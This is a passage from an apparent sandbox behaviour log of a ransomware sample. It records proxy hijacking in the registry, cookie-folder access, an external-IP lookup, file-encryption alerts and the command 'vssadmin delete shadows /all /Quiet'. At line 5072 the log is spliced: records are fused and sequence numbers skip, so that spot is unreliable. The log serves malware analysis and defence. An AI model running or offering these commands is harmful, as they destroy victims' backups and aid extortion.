4771.              pid: 1460
4772.              imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
4773.              md5sum: c8a8321292a459b0a17fb39a782a5c74
4774.          source:
4775.            processinfo:
4776.              pid: 1648
4777.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4778.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4779.        process:
4780.          timestamp: 43080
4781.          mode: opened
4782.          sequenceNumber: 338
4783.          desiredaccess: 0x02000030
4784.          ntstatus: 0x00000000
4785.          target:
4786.            processinfo:
4787.              pid: 1312
4788.              imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
4789.              md5sum: c8a8321292a459b0a17fb39a782a5c74
4790.          source:
4791.            processinfo:
4792.              pid: 1648
4793.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4794.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4795.        process:
4796.          timestamp: 43086
4797.          mode: opened
4798.          sequenceNumber: 339
4799.          desiredaccess: 0x02000030
4800.          ntstatus: 0x00000000
4801.          target:
4802.            processinfo:
4803.              pid: 1324
4804.              imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
4805.              md5sum: 904e13ba41af2e353a32cf351ca53639
4806.          source:
4807.            processinfo:
4808.              pid: 1648
4809.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4810.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4811.        process:
4812.          timestamp: 43092
4813.          mode: opened
4814.          sequenceNumber: 340
4815.          desiredaccess: 0x02000030
4816.          ntstatus: 0x00000000
4817.          target:
4818.            processinfo:
4819.              pid: 1852
4820.              imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
4821.              md5sum: 904e13ba41af2e353a32cf351ca53639
4822.          source:
4823.            processinfo:
4824.              pid: 1648
4825.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4826.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4827.        process:
4828.          timestamp: 43097
4829.          mode: opened
4830.          sequenceNumber: 341
4831.          desiredaccess: 0x02000030
4832.          ntstatus: 0x00000000
4833.          target:
4834.            processinfo:
4835.              pid: 2152
4836.              imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
4837.              md5sum: 619a67c9f617b7e69315bb28ecd5e1df
4838.          source:
4839.            processinfo:
4840.              pid: 1648
4841.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4842.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4843.        regkey:
4844.          timestamp: 42406
4845.          mode: setval
4846.          sequenceNumber: 342
4847.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
4848.           processinfo:
4849.             pid: 1648
4850.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4851.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4852.         regkey:
4853.           timestamp: 42406
4854.           mode: setval
4855.           sequenceNumber: 343
4856.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyServer" = 10.0.0.2:8080
4857.          processinfo:
4858.            pid: 1648
4859.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4861.        regkey:
4862.          timestamp: 42406
4863.          mode: deleteval
4864.          sequenceNumber: 344
4865.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyOverride"
4866.           processinfo:
4867.             pid: 1648
4868.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4869.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4870.         regkey:
4871.           timestamp: 42407
4872.           mode: deleteval
4873.           sequenceNumber: 345
4874.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoConfigURL"
4875.          processinfo:
4876.            pid: 1648
4877.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4878.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4879.        regkey:
4880.          timestamp: 42407
4881.          mode: deleteval
4882.          sequenceNumber: 346
4883.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoDetect"
4884.           processinfo:
4885.             pid: 1648
4886.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4887.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4888.         regkey:
4889.           timestamp: 42407
4890.           mode: setval
4891.           sequenceNumber: 347
4892.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 21 00 00 00 09 00 00 00 0d 00 00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 0a 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
4893.          processinfo:
4894.            pid: 1648
4895.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4896.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4897.        file:
4898.          timestamp: 43201
4899.          mode: failed
4900.          sequenceNumber: 348
4901.          value: C:\Users\Administrator\AppData\Roaming\DNSAPI.DLL
4902.          processinfo:
4903.            tainted: true
4904.            pid: 1648
4905.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4906.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4907.            ads:
4908.          fid (ads:): 0
4909.          failure: open
4910.          ntstatus: 0xc0000034
4911.          CreateOptions: 0x200000
4912.          PE:
4913.            InspectionType: Ext
4914.        process:
4915.          timestamp: 43205
4916.          mode: opened
4917.          sequenceNumber: 349
4918.          desiredaccess: 0x02000030
4919.          ntstatus: 0x00000000
4920.          target:
4921.            processinfo:
4922.              pid: 2320
4923.              imagepath: C:\Windows\System32\taskhost.exe
4924.              md5sum: 639774c9acd063f028f6084abf5593ad
4925.          source:
4926.            processinfo:
4927.              pid: 1648
4928.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4929.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4930.        folder:
4931.          timestamp: 43210
4932.          mode: open
4933.          sequenceNumber: 350
4934.          value: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
4935.          processinfo:
4936.            pid: 1648
4937.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4938.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4939.          ntstatus: 0x0
4940.          CreateOptions: 0x200000
4941.        apicall:
4942.          timestamp: 42455
4943.          sequenceNumber: 351
4944.          processinfo:
4945.            pid: 1648
4946.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4947.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4948.          dllname: kernel32.dll
4949.          apiname: GetVolumeNameForVolumeMountPointW
4950.          address: 0x76220aaa
4951.          params:
4952.            param (id:1): NULL
4953.            param (id:2): \\?\Volume{a4dcb962-c2b8-11e2-8b83-806e6f6e6963}\
4954.        apicall:
4955.          timestamp: 42467
4956.          sequenceNumber: 352
4957.          processinfo:
4958.            pid: 1648
4959.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4960.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4961.          dllname: kernel32.dll
4962.          apiname: GetVolumeNameForVolumeMountPointW
4963.          address: 0x76220e20
4964.          params:
4965.            param (id:1): NULL
4966.            param (id:2): \\?\Volume{a4dcb965-c2b8-11e2-8b83-806e6f6e6963}\
4967.        apicall:
4968.          timestamp: 42471
4969.          sequenceNumber: 353
4970.          processinfo:
4971.            pid: 1648
4972.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4973.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4974.          dllname: kernel32.dll
4975.          apiname: GetVolumeNameForVolumeMountPointW
4976.          address: 0x76220e20
4977.          params:
4978.            param (id:1): NULL
4979.            param (id:2): \\?\Volume{a4dcb962-c2b8-11e2-8b83-806e6f6e6963}\
4980.        regkey:
4981.          timestamp: 42530
4982.          mode: setval
4983.          sequenceNumber: 354
4984.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\"CachePrefix" =
4985.           processinfo:
4986.             pid: 1648
4987.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4988.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4989.         file:
4990.           timestamp: 43451
4991.           mode: failed
4992.           sequenceNumber: 355
4993.           value: C:\Users\Administrator
4994.           processinfo:
4995.             pid: 1648
4996.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
4997.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
4998.             ads:
4999.           fid (ads:): 0
5000.           failure: created
5001.           ntstatus: 0xc0000035
5002.           CreateOptions: 0x200021
5003.         file:
5004.           timestamp: 43455
5005.           mode: failed
5006.           sequenceNumber: 356
5007.           value: C:\Users\Administrator\AppData\Local
5008.           processinfo:
5009.             pid: 1648
5010.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5011.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5012.             ads:
5013.           fid (ads:): 0
5014.           failure: created
5015.           ntstatus: 0xc0000035
5016.           CreateOptions: 0x200021
5017.         file:
5018.           timestamp: 43458
5019.           mode: failed
5020.           sequenceNumber: 357
5021.           value: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files
5022.           processinfo:
5023.             pid: 1648
5024.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5025.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5026.             ads:
5027.           fid (ads:): 0
5028.           failure: created
5029.           ntstatus: 0xc0000035
5030.           CreateOptions: 0x200021
5031.         regkey:
5032.           timestamp: 42537
5033.           mode: setval
5034.           sequenceNumber: 358
5035.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\"CachePrefix" = Cookie:
5036.          processinfo:
5037.            pid: 1648
5038.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5039.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5040.        file:
5041.          timestamp: 43466
5042.          mode: failed
5043.          sequenceNumber: 359
5044.          value: C:\Users\Administrator\AppData\Roaming
5045.          processinfo:
5046.            pid: 1648
5047.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5048.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5049.            ads:
5050.          fid (ads:): 0
5051.          failure: created
5052.          ntstatus: 0xc0000035
5053.          CreateOptions: 0x200021
5054.        file:
5055.          timestamp: 43470
5056.          mode: failed
5057.          sequenceNumber: 360
5058.          value: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
5059.          processinfo:
5060.            pid: 1648
5061.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5062.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5063.            ads:
5064.          fid (ads:): 0
5065.          failure: created
5066.          ntstatus: 0xc0000035
5067.          CreateOptions: 0x200021
5068.        regkey:
5069.          timestamp: 42542
5070.          mode: setval
5071.          sequenceNumber: 361
5072.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\"CachePrefix""C:\Windows\System32\vssadmin.exe" delete shadows /all   /Quiet
5073.           filesize: 167424
5074.           md5sum: e23dd973e1444684eb36365deff1fc74
5075.           sha1sum: 09fafeb1b8404124b33c44440be7e3fdb6105f8a
5076.             ads:
5077.           fid (ads:): 281474976737319
5078.         process:
5079.           timestamp: 43696
5080.           mode: opened
5081.           sequenceNumber: 395
5082.           desiredaccess: 0x02000030
5083.           ntstatus: 0xc0000022
5084.           target:
5085.             processinfo:
5086.               pid: 4
5087.               tid: 0
5088.               imagepath: N/A
5089.           source:
5090.             processinfo:
5091.               pid: 1648
5092.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5093.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5094.         process:
5095.           timestamp: 43700
5096.           mode: opened
5097.           sequenceNumber: 396
5098.           desiredaccess: 0x02000030
5099.           ntstatus: 0xc0000022
5100.           target:
5101.             processinfo:
5102.               pid: 384
5103.               tid: 0
5104.               imagepath: N/A
5105.           source:
5106.             processinfo:
5107.               pid: 1648
5108.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5109.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5110.         process:
5111.           timestamp: 43704
5112.           mode: opened
5113.           sequenceNumber: 397
5114.           desiredaccess: 0x02000030
5115.           ntstatus: 0x00000000
5116.           target:
5117.             processinfo:
5118.               pid: 2864
5119.               imagepath: C:\Windows\System32\vssadmin.exe
5120.               md5sum: e23dd973e1444684eb36365deff1fc74
5121.           source:
5122.             processinfo:
5123.               pid: 1648
5124.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5125.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5126.         process:
5127.           timestamp: 43708
5128.           mode: opened
5129.           sequenceNumber: 398
5130.           desiredaccess: 0x02000030
5131.           ntstatus: 0x00000000
5132.           target:
5133.             processinfo:
5134.               pid: 2872
5135.               imagepath: C:\Windows\System32\conhost.exe
5136.               md5sum: 402b44b31c7183fcf2c4e1083af317fa
5137.           source:
5138.             processinfo:
5139.               pid: 1648
5140.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5141.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5142.         Ransom:
5143.           timestamp: 43039
5144.           sequenceNumber: 399
5145.           pattern: MC
5146.           value: C:\34aSjIoCE1\k-xbuv.jpg
5147.           md5sum: 098380c72ef9e65a3f005a574cfdf1bb
5148.         process:
5149.           timestamp: 43715
5150.           mode: opened
5151.           sequenceNumber: 400
5152.           desiredaccess: 0x02000030
5153.           ntstatus: 0xc0000022
5154.           target:
5155.             processinfo:
5156.               pid: 4
5157.               tid: 0
5158.               imagepath: N/A
5159.           source:
5160.             processinfo:
5161.               pid: 1648
5162.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5163.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5164.         process:
5165.           timestamp: 43719
5166.           mode: opened
5167.           sequenceNumber: 401
5168.           desiredaccess: 0x02000030
5169.           ntstatus: 0xc0000022
5170.           target:
5171.             processinfo:
5172.               pid: 384
5173.               tid: 0
5174.               imagepath: N/A
5175.           source:
5176.             processinfo:
5177.               pid: 1648
5178.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5179.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5180.         process:
5181.           timestamp: 43723
5182.           mode: opened
5183.           sequenceNumber: 402
5184.           desiredaccess: 0x02000030
5185.           ntstatus: 0x00000000
5186.           target:
5187.             processinfo:
5188.               pid: 2864
5189.               imagepath: C:\Windows\System32\vssadmin.exe
5190.               md5sum: e23dd973e1444684eb36365deff1fc74
5191.           source:
5192.             processinfo:
5193.               pid: 1648
5194.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5195.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5196.         process:
5197.           timestamp: 43727
5198.           mode: opened
5199.           sequenceNumber: 403
5200.           desiredaccess: 0x02000030
5201.           ntstatus: 0x00000000
5202.           target:
5203.             processinfo:
5204.               pid: 2872
5205.               imagepath: C:\Windows\System32\conhost.exe
5206.               md5sum: 402b44b31c7183fcf2c4e1083af317fa
5207.           source:
5208.             processinfo:
5209.               pid: 1648
5210.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5211.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5212.         file:
5213.           timestamp: 43733
5214.           mode: failed
5215.           sequenceNumber: 404
5216.           value: C:\Users\Administrator\AppData\Roaming\DHCPCSVC6.DLL
5217.           processinfo:
5218.             tainted: true
5219.             pid: 1648
5220.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5221.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5222.             ads:
5223.           fid (ads:): 0
5224.           failure: open
5225.           ntstatus: 0xc0000034
5226.           CreateOptions: 0x200000
5227.           PE:
5228.             InspectionType: Ext
5229.         process:
5230.           timestamp: 43737
5231.           mode: opened
5232.           sequenceNumber: 405
5233.           desiredaccess: 0x02000030
5234.           ntstatus: 0xc0000022
5235.           target:
5236.             processinfo:
5237.               pid: 4
5238.               tid: 0
5239.               imagepath: N/A
5240.           source:
5241.             processinfo:
5242.               pid: 1648
5243.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5244.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5245.         process:
5246.           timestamp: 43741
5247.           mode: opened
5248.           sequenceNumber: 406
5249.           desiredaccess: 0x02000030
5250.           ntstatus: 0xc0000022
5251.           target:
5252.             processinfo:
5253.               pid: 384
5254.               tid: 0
5255.               imagepath: N/A
5256.           source:
5257.             processinfo:
5258.               pid: 1648
5259.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5260.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5261.         regkey:
5262.           randomized: true
5263.           mode: queryvalue
5264.           sequenceNumber: 407
5265.           timestamp: 43617
5266.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
5267.          processinfo:
5268.            pid: 2864
5269.            imagepath: C:\Windows\System32\vssadmin.exe
5270.            md5sum: e23dd973e1444684eb36365deff1fc74
5271.        process:
5272.          timestamp: 43748
5273.          mode: opened
5274.          sequenceNumber: 408
5275.          desiredaccess: 0x02000030
5276.          ntstatus: 0x00000000
5277.          target:
5278.            processinfo:
5279.              pid: 2864
5280.              imagepath: C:\Windows\System32\vssadmin.exe
5281.              md5sum: e23dd973e1444684eb36365deff1fc74
5282.          source:
5283.            processinfo:
5284.              pid: 1648
5285.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5286.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5287.        process:
5288.          timestamp: 43754
5289.          mode: opened
5290.          sequenceNumber: 409
5291.          desiredaccess: 0x02000030
5292.          ntstatus: 0x00000000
5293.          target:
5294.            processinfo:
5295.              pid: 2872
5296.              imagepath: C:\Windows\System32\conhost.exe
5297.              md5sum: 402b44b31c7183fcf2c4e1083af317fa
5298.          source:
5299.            processinfo:
5300.              pid: 1648
5301.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5302.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5303.        Ransom:
5304.          timestamp: 43628
5305.          sequenceNumber: 410
5306.          pattern: MC
5307.          value: C:\34aSjIoCE1\kvqmtMjt.txt
5308.          md5sum: 716f17a1c0c6955d09df7d108752499b
5309.        file:
5310.          timestamp: 43761
5311.          mode: failed
5312.          sequenceNumber: 411
5313.          value: C:\Users\Administrator\AppData\Roaming\DHCPCSVC.DLL
5314.          processinfo:
5315.            tainted: true
5316.            pid: 1648
5317.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5318.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5319.            ads:
5320.          fid (ads:): 0
5321.          failure: open
5322.          ntstatus: 0xc0000034
5323.          CreateOptions: 0x200000
5324.          PE:
5325.            InspectionType: Ext
5326.        file:
5327.          timestamp: 43765
5328.          mode: failed
5329.          sequenceNumber: 412
5330.          value: C:\Users\Administrator\AppData\Roaming\RPCRTREMOTE.DLL
5331.          processinfo:
5332.            tainted: true
5333.            pid: 1648
5334.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5335.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5336.            ads:
5337.          fid (ads:): 0
5338.          failure: open
5339.          ntstatus: 0xc0000034
5340.          CreateOptions: 0x200000
5341.          PE:
5342.            InspectionType: Ext
5343.        file:
5344.          timestamp: 43770
5345.          mode: failed
5346.          sequenceNumber: 413
5347.          value: C:\Users\Administrator\AppData\Roaming\RASADHLP.DLL
5348.          processinfo:
5349.            tainted: true
5350.            pid: 1648
5351.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5352.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5353.            ads:
5354.          fid (ads:): 0
5355.          failure: open
5356.          ntstatus: 0xc0000034
5357.          CreateOptions: 0x200000
5358.          PE:
5359.            InspectionType: Ext
5360.        Ransom:
5361.          timestamp: 43760
5362.          sequenceNumber: 414
5363.          pattern: MC
5364.          value: C:\34aSjIoCE1\nMEkg.xls
5365.          md5sum: a60e4dc73d17d62b4df33d3b6ded21b5
5366.        apicall:
5367.          timestamp: 43795
5368.          repeat: 30
5369.          sequenceNumber: 415
5370.          processinfo:
5371.            pid: 1648
5372.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5373.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5374.          dllname: kernel32.dll
5375.          apiname: Sleep
5376.          address: 0x0041ed5b
5377.        network:
5378.          timestamp: 43806
5379.          mode: dns_query
5380.          sequenceNumber: 416
5381.          processinfo:
5382.            tainted: true
5383.            pid: 1648
5384.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5385.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5386.          protocol_type: udp
5387.          qtype: Host Address
5388.          hostname: myexternalip.com
5389.        malicious-alert:
5390.          classtype: Network-Activity
5391.          weight: 0
5392.          ruleid: 5604 : Network outbound communication attempted ; Process attempting connections via dns_query
5393.          msg: Process attempting connections via dns_query
5394.          display-msg: Network outbound communication attempted
5395.        malicious-alert:
5396.          classtype: misc-anom
5397.          weight: 100
5398.          ruleid: 10098 : Persistance with Self Delete Activity ; Persistance with Self Delete Activity
5399.          msg: Persistance with Self Delete Activity
5400.          display-msg: Persistance with Self Delete Activity
5401.        process:
5402.          timestamp: 43839
5403.          mode: opened
5404.          sequenceNumber: 417
5405.          desiredaccess: 0x02000030
5406.          ntstatus: 0xc0000022
5407.          target:
5408.            processinfo:
5409.              pid: 4
5410.              tid: 0
5411.              imagepath: N/A
5412.          source:
5413.            processinfo:
5414.              pid: 1648
5415.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5416.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5417.        network:
5418.          timestamp: 43844
5419.          mode: dns_query_answer
5420.          sequenceNumber: 418
5421.          processinfo:
5422.            tainted: true
5423.            pid: 1648
5424.            imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
5425.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5426.          protocol_type: udp
5427.          dns_response_code: 0
5428.          hostname: myexternalip.com
5429.          answer_number: 1
5430.          ipaddress: 199.16.199.2
5431.        process:
5432.          timestamp: 43849
5433.          mode: opened
5434.          sequenceNumber: 419
5435.          desiredaccess: 0x02000030
5436.          ntstatus: 0xc0000022
5437.          target:
5438.            processinfo:
5439.              pid: 384
5440.              tid: 0
5441.              imagepath: N/A
5442.          source:
5443.            processinfo:
5444.              pid: 1648
5445.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5446.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5447.        process:
5448.          timestamp: 43855
5449.          mode: opened
5450.          sequenceNumber: 420
5451.          desiredaccess: 0x02000030
5452.          ntstatus: 0x00000000
5453.          target:
5454.            processinfo:
5455.              pid: 2864
5456.              imagepath: C:\Windows\System32\vssadmin.exe
5457.              md5sum: e23dd973e1444684eb36365deff1fc74
5458.          source:
5459.            processinfo:
5460.              pid: 1648
5461.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5462.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5463.        process:
5464.          timestamp: 43860
5465.          mode: opened
5466.          sequenceNumber: 421
5467.          desiredaccess: 0x02000030
5468.          ntstatus: 0x00000000
5469.          target:
5470.            processinfo:
5471.              pid: 2872
5472.              imagepath: C:\Windows\System32\conhost.exe
5473.              md5sum: 402b44b31c7183fcf2c4e1083af317fa
5474.          source:
5475.            processinfo:
5476.              pid: 1648
5477.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5478.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5479.        apicall:
5480.          timestamp: 43807
5481.          sequenceNumber: 422
5482.          processinfo:
5483.            pid: 1648
5484.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5485.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5486.          dllname: kernel32.dll
5487.          apiname: GetSystemDirectoryA
5488.          address: 0x76049c36
5489.          params:
5490.            param (id:1): 0x2a4c7d0
5491.            param (id:2): 260
5492.        process:
5493.          timestamp: 43978
5494.          mode: opened
5495.          sequenceNumber: 423
5496.          desiredaccess: 0x02000030
5497.          ntstatus: 0xc0000022
5498.          target:
5499.            processinfo:
5500.              pid: 4
5501.              tid: 0
5502.              imagepath: N/A
5503.          source:
5504.            processinfo:
5505.              pid: 1648
5506.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5507.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5508.        process:
5509.          timestamp: 44062
5510.          mode: opened
5511.          sequenceNumber: 424
5512.          desiredaccess: 0x02000030
5513.          ntstatus: 0xc0000022
5514.          target:
5515.            processinfo:
5516.              pid: 384
5517.              tid: 0
5518.              imagepath: N/A
5519.          source:
5520.            processinfo:
5521.              pid: 1648
5522.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5523.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5524.        process:
5525.          timestamp: 44067
5526.          mode: opened
5527.          sequenceNumber: 425
5528.          desiredaccess: 0x02000030
5529.          ntstatus: 0xc0000022
5530.          target:
5531.            processinfo:
5532.              pid: 4
5533.              tid: 0
5534.              imagepath: N/A
5535.          source:
5536.            processinfo:
5537.              pid: 1648
5538.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5539.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5540.        process:
5541.          timestamp: 44073
5542.          mode: opened
5543.          sequenceNumber: 426
5544.          desiredaccess: 0x02000030
5545.          ntstatus: 0xc0000022
5546.          target:
5547.            processinfo:
5548.              pid: 384
5549.              tid: 0
5550.              imagepath: N/A
5551.          source:
5552.            processinfo:
5553.              pid: 1648
5554.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5555.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5556.        Ransom:
5557.          timestamp: 44188
5558.          sequenceNumber: 427
5559.          pattern: MC
5560.          value: C:\34aSjIoCE1\t_cjYFbB.ppt
5561.          md5sum: 8be21a12e0b706db456dcd6c3db78b61
5562.        process:
5563.          timestamp: 44216
5564.          mode: opened
5565.          sequenceNumber: 428
5566.          desiredaccess: 0x02000030
5567.          ntstatus: 0xc0000022
5568.          target:
5569.            processinfo:
5570.              pid: 4
5571.              tid: 0
5572.              imagepath: N/A
5573.          source:
5574.            processinfo:
5575.              pid: 1648
5576.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5577.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5578.        process:
5579.          timestamp: 44220
5580.          mode: opened
5581.          sequenceNumber: 429
5582.          desiredaccess: 0x02000030
5583.          ntstatus: 0xc0000022
5584.          target:
5585.            processinfo:
5586.              pid: 384
5587.              tid: 0
5588.              imagepath: N/A
5589.          source:
5590.            processinfo:
5591.              pid: 1648
5592.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5593.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5594.        process:
5595.          timestamp: 44224
5596.          mode: opened
5597.          sequenceNumber: 430
5598.          desiredaccess: 0x02000030
5599.          ntstatus: 0x00000000
5600.          target:
5601.            processinfo:
5602.              pid: 3012
5603.              imagepath: C:\Windows\System32\dllhost.exe
5604.              md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
5605.          source:
5606.            processinfo:
5607.              pid: 1648
5608.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
5609.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
5610.        process:
5611.          timestamp: 44296
5612.          mode: opened
